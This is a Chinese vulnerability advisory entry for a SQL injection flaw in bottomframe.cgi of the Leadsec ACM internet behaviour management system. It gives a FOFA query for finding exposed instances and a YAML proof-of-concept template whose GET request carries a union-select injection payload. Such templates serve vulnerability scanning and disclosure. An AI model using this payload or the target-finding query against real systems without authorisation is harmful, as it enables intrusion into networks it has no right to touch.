leadsec-acm-bottomframe-cgi-sqli: 网御 ACM 上网行为管理系统bottomframe.cgi SQL 注入漏洞

日期: 2025-09-01 | 影响软件: 网御ACM上网行为管理系统 | POC: 已公开

漏洞描述

FOFA: app="网御星云-上网行为管理系统"

PoC代码[已公开]

id: leadsec-acm-bottomframe-cgi-sqli

info:
  name: 网御 ACM 上网行为管理系统bottomframe.cgi SQL 注入漏洞
  author: zan8in
  severity: high
  verified: true
  description: |
    FOFA: app="网御星云-上网行为管理系统"
  tags: leadsec,sqli
  created: 2023/09/03

rules:
  r0:
    request:
      method: GET
      path: /bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23
    expression: response.status == 200 && response.body.bcontains(b"c4ca4238a0b")
expression: r0()

相关漏洞推荐